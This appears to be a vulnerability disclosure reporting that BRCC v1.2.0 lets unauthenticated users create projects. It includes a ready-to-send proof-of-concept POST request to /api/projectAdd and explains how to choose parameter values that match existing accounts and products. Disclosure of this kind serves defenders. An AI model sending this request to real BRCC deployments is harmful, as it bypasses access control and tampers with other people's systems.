Improper permission management allowing unauthorized users to create projects arbitrarily

[gaogaostone]

BRCC v1.2.0 has improper permission management, allowing unauthorized users to create projects arbitrarily.

Proof of Concept:

Send the following request to add project and it successfully adds the project. The request was unauthorized without rcc-token, token or cookie. There are six parameters. The parameter apiPassword and memo can be arbitrary. The parameter name should keep unique in the system. The parameter userName should be the existing username in the system. The parameter productName should be an existing product name in the system and it could be managed by the corresponding username. The value of parameter projectType can be 0.

POST /api/projectAdd HTTP/1.1
Host: x.x.x.x:8089
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64; rv:56.0) Gecko/20100101 Firefox/56.0
Accept: */*
Accept-Language: zh-CN,zh;q=0.8,zh-TW;q=0.7,zh-HK;q=0.5,en-US;q=0.3,en;q=0.2
Accept-Encoding: gzip, deflate, br
Referer: http://x.x.x.x:8089/swagger-ui.html
Content-Type: application/json
Content-Length: 144
Origin: http://x.x.x.x:8089
Connection: keep-alive

{
  "apiPassword": "123456",
  "memo": "string",
  "name": "adminfake5",
  "productName": "putong1",
  "projectType": 0,
  "userName": "admin"
}

When checking the data in the database, we found it is successfully added.